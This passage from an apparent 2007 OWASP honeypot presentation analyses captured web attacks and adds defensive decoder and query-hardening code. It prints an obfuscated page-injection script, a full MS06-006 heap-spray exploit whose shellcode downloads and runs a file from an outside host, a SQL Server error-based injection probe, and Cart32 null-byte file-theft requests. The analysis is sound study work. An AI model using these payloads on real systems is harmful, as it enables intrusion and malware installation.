KZuKquKyuKXuKRuKtuK9uKCuKYuKFu7Ku77u7Nu7Uu7du7wu7eu7iu7Hu7Mu7zu7au7cu7Vu7Wu7nu7Gu7bu7gu7lu76u7su7O%27%3Bvar%20ai%3DString%28%27u%27%29%2CPT%3DArray%288340%5E8245%2C9103%5E9057%2CKS%28%27254%27%29%2CKS%28%27239%27%29%2C14855%5E15091%2CKS%28%27237%27%29%2C28266%5E28291%2CKS%28%27163%27%29%2C30960%5E30731%2C5993%5E6017%2C21960%5E21819%2CKS%28%27242%27%29%2CKS%28%27189%27%29%2C32203%5E32051%2C15056%5E14901%2CKS%28%27181%27%29%2CKS%28%27214%27%29%2CKS%28%27218%27%29%2CKS%28%27228%27%29%2C18460%5E18605%2C3478%5E3399%2CKS%28%27215%27%29%2CKS%28%27180%27%29%2CKS%28%27230%27%29%2C26866%5E26649%2C8641%5E8509%2CKS%28%27249%27%29%2C3779%5E3683%2CKS%28%27234%27%29%2C29950%5E29735%2C6373%5E6175%2C27055%5E26889%2C10830%5E11005%2CKS%28%27201%27%29%2C10553%5E10697%2C21401%5E21295%2CKS%28%27165%27%29%2CKS%28%27171%27%29%2C32204%5E32101%2CKS%28%27173%27%29%2CKS%28%27246%27%29%2C32516%5E32699%2CKS%28%27208%
--CUT--
KaKNKMKIKVKzKeK8KNKUKVKrKeKV7VKYKVKIKVKzKeKnKRKdKHKUKrKIKVKRKOKJ7cKGKLK8K7KVKeKyKeKUKd7WKMKeKVKnKRK7KUKNKRKlKWKMKoKOKJ7cKGKLK8KHKUKrKIKV7nKaKUKkKVKUK4KSKJKc7cKGKLK8KxKdKkKeKFK4KtKJ7cKGKLK8KFKVKdK5KFKeK4KtKJKeKUKgKcKTKcKkKaKNKMKIKVKzKeK87WKaKkKgK8KrKwKVKzKkKXKFKdKYKkKn7cKGKLKOKJKVKwKWKnKqKyKXKlKGKCKsKOKJKcKZKNKrKeKNKFKnKVKOKTKcKkKaKNKMKIKVKzKeK8KxKUKdKeKVKnKRKKKFKeKIKYKiKK7WKaKkKgKiKK7KKFKeKIKYKiKRKOKJKkKaKNKMKIKVKzKeK87WKaKkKgK8KrKwKVKzKkKXKFKdKYKkKn7cKGKLKOKJKcKVKwKWKnKqKyKXKlKGKCKsKOKJKcKZ7GKHKMKzKNKeKdKaKzKc77Kq7eKnKOKTKcKpKrKUKcKbKjKpK47bKfKJKpKrKUKcK5Kz7gK4KPKSKt7b7lKf76Km7sKh7MKSKr7WKNKkKVKHKPKlKgKY7VK4KPKPKJKcKHKaKUKnKgKGKNK4KSKJKcKgKGKNKcKKKcKbKjKpKJKcKgKGKNK3K3KOKcKgKY7VK3K4KcK5Kz7gK8K7KM7WK7KeKUKnKBKrKeKFK8KHKYKaKUKnKBKrKeKFK8KUKrKzKkKaKIKnKO7OK5Kz7gK8KYKVKzK5KeKFKOKlKtKOKJKcKUKVKeKMKUKzKcKgKY7VKJKcKZKK7KNKUKdKwKeKi%27%3Bvar%20nU%3DString%28%29%3Bfunction%20KS%28Pj%29%7Breturn%20parseInt%28Pj%29%7Dzl%3Dzl.split%28ai%29%3Bfor%28DS%3D0%3BDS%3CRk.length%3BDS+%3D2%29%7Bbq%3DRk.substr%28DS%2C2%29%3Bfor%28wc%3D0%3Bwc%3Czl.length%3Bwc++%29%7Bif%28zl%5Bwc%5D%3D%3Dbq%29break%3B%7D%20nU+%3DString.fromCharCode%28PT%5Bwc%5D%5E157%29%3B%7Ddocument.write%28nU%29%3B%7D%0Acatch%28e%29%7B%7D%3C/script%3E"))</script><!--[/O]-->

URL-decoded, the two readable parts of the payload are the variable set-up after the first long string and the decoder loop at the very end:

';var ai=String('u'),PT=Array(8340^8245,9103^9057,KS('254'),KS('239'),14855^15091,KS('237'),28266^28291,KS('163'),30960^30731,5993^6017,21960^21819,KS('242'),KS('189'),32203^32051,15056^14901,KS('181'),KS('214'),KS('218'),KS('228'),18460^18605,3478^3399,KS('215'),KS('180'),KS('230'),26866^26649,8641^8509,KS('249'),3779^3683,KS('234'),29950^29735,6373^6175,27055^26889,10830^11005,KS('201'),10553^10697,21401^21295,KS('165'),KS('171'),32204^32101,KS('173'),KS('246'),32516^32699,KS('208 --CUT--

';var nU=String();function KS(Pj){return parseInt(Pj)}zl=zl.split(ai);for(DS=0;DS<Rk.length;DS+=2){bq=Rk.substr(DS,2);for(wc=0;wc<zl.length;wc++){if(zl[wc]==bq)break;} nU+=String.fromCharCode(PT[wc]^157);}document.write(nU);}
catch(e){}</script>

So the scheme is a simple substitution: zl is a list of two-character keys separated by 'u', Rk is the hidden script written as a run of those keys, and each key's position in zl selects an entry of PT, which XOR 157 is the character code that gets appended and finally written into the page with document.write(). The PT entries are only dressed up as arithmetic; evaluated in order they are the character codes of the distinct characters of the hidden script (the first seven decode to "<script"). The whole thing is wrapped in try/catch so that a browser which chokes on any of it shows nothing.

OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007

Sandbox Testing the Javascript
- I decided to test out executing the JavaScript to see what it would do.
- I used Sandboxie and Burp Proxy to intercept/manipulate/record the JavaScript.
- Here we go…

Redirect to a new site

GET /html/ HTTP/1.1
Host: www.example.com.cee4f2730c07001bdf06d6a5.update1.classictel.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Accept: text/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.example.com/js.html

HTTP/1.1 302 Found
Date: Mon, 08 Oct 2007 21:28:45 GMT
Server: Apache/2.2.4 (Fedora)
X-Powered-By: PHP/5.1.6
Location: http://bibi32.org/505/Xp/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006)

<HTML><HEAD>
<SCRIPT>
function getpayload() {
return "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u622F%u6269%u3369%u2E32%u726F%u2F67%u3035%u2F35%u7058%u2F2F%u6966%u656C%u702E%u7068";
}
var s=unescape("%u4141%u4141%u4141");
do {s+=s} while(s.length<0x0900000);
s+=unescape(getpayload());
</SCRIPT>
</HEAD><BODY><EMBED SRC="--------------------------------CUT-AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAA NNNNOOOOAAA QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></EMBED></BODY></HTML>

(Callout on the slide: WMV file extension.) The script first sprays the heap with a 0x41 pattern doubled up to 0x900000 UTF-16 units, appends the %u-escaped shellcode, and then hands the plugin an over-long .wmv file name through the EMBED tag to trigger the overflow.

Cross-site Scripting (XSS)
Cross-site Scripting (XSS) is an attack technique that forces a web site to echo attacker-supplied executable code, which loads in a user's browser.
- All inbound XSS alert messages were triggered by either
  - spammers sending their HTML posts to various message boards
  - poor HTML that accidentally added JavaScript to links

SQL Injection
SQL Injection is an attack technique used to exploit web sites that construct SQL statements from user-supplied input.
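Worked through as an added example, not code from the presentation or from the honeypot's rule set: what the pid probe on this slide does to a lookup that splices the parameter into its SQL text, the parameterized form that makes the same input harmless, and a triage check of the kind the honeypot's ModSecurity rules alert on. The probe value is the one in the request; the products table, the query text and the function names are assumptions made for the example (Node.js).

```javascript
// Added example, not code from the presentation. PROBE is the pid value from the
// request on this slide; the query, table and function names are assumptions.
const PROBE = "6246'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='";

// Decode a query-string value the way the server's request parser does:
// '+' means space, then percent-decoding.
function decodeQueryValue(raw) {
  return decodeURIComponent(raw.replace(/\+/g, " "));
}

// Vulnerable: the value is spliced into the statement text, so the attacker's
// quote closes the literal and the rest of the value is executed as SQL.
function vulnerableLookup(pid) {
  return "SELECT name, price FROM products WHERE pid='" + pid + "'";
}

// Hardened: the value travels as a bound parameter, so quotes and keywords in it
// stay data. (Shape of a parameterized query object; the placeholder syntax is
// whatever the driver in use expects.)
function parameterizedLookup(pid) {
  return { text: "SELECT name, price FROM products WHERE pid = @pid", params: { pid } };
}

// Why the probe works as an extraction channel on SQL Server: char(124)+user+char(124)
// is the string '|<dbuser>|'. Comparing it with the integer 0 forces an implicit
// conversion, which fails with
//   Conversion failed when converting the varchar value '|dbo|' to data type int.
// and a verbose error page returns that message, user name included, to the client.
// The trailing and '%'=' only re-balances the quotes of the original statement.

// Triage check in the spirit of the honeypot's ModSecurity rules: a quote followed
// by a boolean operator, or a T-SQL char() call, in a field that should be numeric.
function looksLikeSqlInjection(value) {
  return /'\s*(and|or)\b/i.test(value) || /\bchar\s*\(\s*\d+\s*\)/i.test(value);
}
```

Run it on the probe and vulnerableLookup() shows the statement the database actually receives; parameterizedLookup() keeps the same value out of the statement text altogether, which is the fix. The triage regex is deliberately narrow and only meant for a numeric field; a production rule set needs the normalization and evasion handling that the Core Rules carry.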
GET http://www.example.com/app.aspx?pid=6246'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'=' HTTP/1.1
User-Agent: Internet Explorer 6.0
Host: www.example.com
Cookie: ASP.NET_SessionId=zidkywu4rcfegi554fmc3c2q

Decoded, the pid value is 6246' and char(124)+user+char(124)=0 and '%'='. The comparison makes Microsoft SQL Server convert the string '|'+user+'|' to an integer; when that conversion fails, the error message quotes the offending string, so a verbose error page hands the database user name straight back to the attacker.

Cart32 GetImage Arbitrary File Download Exploit Attempt
- Description: Cart32 is a web-based content manager. The application is exposed to an arbitrary file download issue because it fails to sufficiently sanitize user-supplied input to the "ImageName" parameter of the "GetImage" script. Cart32 version 6.3 is affected.
- Ref: http://www.securityfocus.com/bid/25928
- Exploit example:
  - GET //cgi-bin/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf HTTP/1.1
- The %00.pdf suffix is the classic null-byte trick: an extension check that looks at the end of the decoded string sees .pdf, while the C runtime call that opens the file stops at the NUL and returns CustomerEmail.txt.
- The attacker sent similar probes for other common directory locations for the Cart32 application:
  - //scripts/c32web.exe/GetImage
  - //cgi/c32web.exe/GetImage
  - //Cart32/c32web.exe/GetImage

Information Leakage
Information Leakage is when a web site reveals sensitive data, such as developer comments or error messages, which may aid an attacker in exploiting the system.
- As the previous section on SQL Injection showed, presenting verbose error messages to clients can not only provide attackers with information to aid in future attacks, but can also be the actual transport for extracted information.

Example Detailed Error Message
(Screenshot on the slide of a detailed error page.)

Reveals Version Information
(Screenshot on the slide of a response that reveals version information.)

Insufficient Anti-Automation
Insufficient Anti-automation is when a web site permits an attacker to automate a process that should only be performed manually. Certain web site functionalities should be protected against automated attacks.
- Account registrations
- Blog/forum postings

The Poor-Man's CAPTCHA
Response details:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="Username : nospam - Password : iamnotspam"
Content-Length: 401
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from webgate
X-Cache-Lookup: MISS from webgate:80
Via: 1.0 www.testproxy.net
Notice: Subject to Monitoring
Connection: close

The credentials are handed to the human reader in the realm string of the 401 challenge; a posting bot that never displays the realm, or does not retry with credentials, is stopped. It costs nothing, but it only holds until an attacker reads the realm once and scripts the login.

Lessons Learned (1)
- Web attacks are running rampant
  - Automation
  - Attackers are extremely bold, mainly because of the anonymity they get by hiding behind numerous open proxy servers
- Application defects (server misconfigurations, cookie weaknesses, error messages) are a significant problem area
- False positives were high in some classes of attacks; however, that was mainly due to the open proxy deployment and would not manifest itself in normal production environments

Lessons Learned (2)
- As good as the identification/protection rules were, we still had analysis challenges due to data overload
  - We need better/automated ways to categorize attacks
  - Even so, some activities are difficult to identify by looking at just one transaction
  - We need better correlation capabilities to identify anomalies and trends over time
- Correlation of event data and full audit logging forensics is essential
- If you would like to participate in the WASC Distributed Open Proxy Honeypot Project, please visit the website for more information: http://www.webappsec.org/projects/honeypots/
- Questions?
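Two of the samples in this deck can be read offline with a few lines of code: the substitution-and-XOR script in the obfuscated JavaScript sample and the %u-escaped shellcode of the MS06-006 exploit. The following is an added example, not code from the presentation. It re-implements the sample's decoder loop without document.write(), checks it against PT values copied from the slide, round-trips a constructed string through an encoder written here for the purpose (the attacker's encoder is not on the slide), and pulls the readable strings out of two shellcode fragments copied from getpayload(). Function names and the key pool of the encoder are assumptions (Node.js).

```javascript
// Added example, not code from the presentation. Two decoders for the samples in
// this deck: the substitution+XOR script and the %u-escaped MS06-006 shellcode.

// --- 1. The obfuscated script -----------------------------------------------
// In the sample, zl is a list of two-character keys separated by 'u', PT holds the
// character codes of the hidden script's distinct characters XOR 157 (each written
// as a^b or as KS('n'), i.e. parseInt), and Rk is the message as a run of keys.

// Same loop as the sample's decoder, returning the text instead of writing it to the page.
function decodeSubstitution(Rk, zl, PT) {
  const keys = zl.split("u");
  let out = "";
  for (let i = 0; i < Rk.length; i += 2) {
    const idx = keys.indexOf(Rk.slice(i, i + 2));   // the sample uses substr(i, 2)
    out += String.fromCharCode(PT[idx] ^ 157);
  }
  return out;
}

// Read in order, PT is simply the alphabet, so one XOR per entry reveals it.
function alphabetFromPT(PT) {
  return PT.map((v) => String.fromCharCode(v ^ 157)).join("");
}

// The first thirteen PT entries exactly as they appear in the sample.
const PT_FROM_SAMPLE = [
  8340 ^ 8245, 9103 ^ 9057, parseInt("254"), parseInt("239"), 14855 ^ 15091,
  parseInt("237"), 28266 ^ 28291, parseInt("163"), 30960 ^ 30731, 5993 ^ 6017,
  21960 ^ 21819, parseInt("242"), parseInt("189"),
];

// Encoder for the same scheme, written here to show the round trip (the attacker's
// encoder is not on the slide). Keys never contain 'u', because zl is split on it.
function encodeSubstitution(plain) {
  const pool = "ABCDEFGHIJLMNOPQRSTVWXYZabcdefghijklmnopqrstvwxyz0123456789"; // no 'u'/'U'
  const keyFor = new Map();
  const PT = [];
  let Rk = "";
  for (const ch of plain) {
    if (!keyFor.has(ch)) {
      const n = keyFor.size;
      if (n >= 2 * pool.length) throw new Error("too many distinct characters for this key pool");
      keyFor.set(ch, (n < pool.length ? "K" : "7") + pool[n % pool.length]);
      PT.push(ch.charCodeAt(0) ^ 157);
    }
    Rk += keyFor.get(ch);
  }
  return { Rk, zl: [...keyFor.values()].join("u"), PT };
}

// --- 2. The %u-escaped shellcode --------------------------------------------
// unescape("%u54EB") yields one UTF-16 code unit; the heap spray lays the units out
// little-endian, so the low byte is the first byte of the executable code.
function shellcodeBytes(escaped) {
  const bytes = [];
  for (const m of escaped.matchAll(/%u([0-9a-fA-F]{4})/g)) {
    const unit = parseInt(m[1], 16);
    bytes.push(unit & 0xff, unit >> 8);
  }
  return bytes;
}

// Printable runs of at least minLen bytes, the quickest way to see what a
// download-and-execute stub fetches and where it writes it.
function printableStrings(bytes, minLen = 4) {
  const found = [];
  let run = "";
  for (const b of [...bytes, 0]) {                   // trailing 0 flushes the last run
    if (b >= 0x20 && b <= 0x7e) { run += String.fromCharCode(b); continue; }
    if (run.length >= minLen) found.push(run);
    run = "";
  }
  return found;
}

// Two fragments copied from getpayload() on the MS06-006 slide. Other instructions sit
// between them on the slide, and the slide cuts the rest of the shellcode.
const SHELLCODE_FRAGMENTS = [
  "%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065",
  "%u7468%u7074%u2F3A%u622F%u6269%u3369%u2E32%u726F%u2F67%u3035%u2F35%u7058%u2F2F%u6966%u656C%u702E%u7068",
];

function stringsFromSlideShellcode() {
  return SHELLCODE_FRAGMENTS.flatMap((f) => printableStrings(shellcodeBytes(f)));
}
```

alphabetFromPT(PT_FROM_SAMPLE) returns "<script>funo ", the distinct characters of the hidden script in order of first appearance, which is all the evidence needed to conclude that PT is an alphabet and not arithmetic. stringsFromSlideShellcode() returns "urlmon.dll", "C:\U.exe" and "http://bibi32.org/505/Xp//file.php"; a DLL name, a local path and a URL are what a download-and-execute stub needs, and that URL lives under the same bibi32.org/505/Xp/ path the 302 on the "Redirect to a new site" slide pointed to. That reading is an inference from the strings, not something the slide states.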